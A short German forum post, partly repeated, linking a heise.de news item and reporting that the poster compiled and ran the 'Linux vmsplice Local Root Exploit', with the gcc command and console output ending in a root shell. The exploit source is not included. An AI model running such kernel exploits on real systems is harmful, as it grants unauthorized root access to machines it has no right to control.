http://www.heise.de/security/Root-Exploit-fuer-Linux-Kernel--/news/meldung/103279
Ich habs eben mal ausprobiert, und die Datei compiliert. Funktioniert einwandfrei.
Mal schauen wann ein Kernel-Update kommt.
Ich habs eben mal ausprobiert, und die Datei compiliert. Funktioniert einwandfrei.
Code:
$ gcc -o exploit_a exploit_a.c
> $ ./exploit_a
> -----------------------------------
> Linux vmsplice Local Root Exploit
> By qaaz
> -----------------------------------
> [+] mmap: 0x0 .. 0x1000
> [+] page: 0x0
> [+] page: 0x20
> [+] mmap: 0x4000 .. 0x5000
> [+] page: 0x4000
> [+] page: 0x4020
> [+] mmap: 0x1000 .. 0x2000
> [+] page: 0x1000
> [+] mmap: 0xb7d99000 .. 0xb7dcb000
> [+] root
> $ whoami
> root
Mal schauen wann ein Kernel-Update kommt.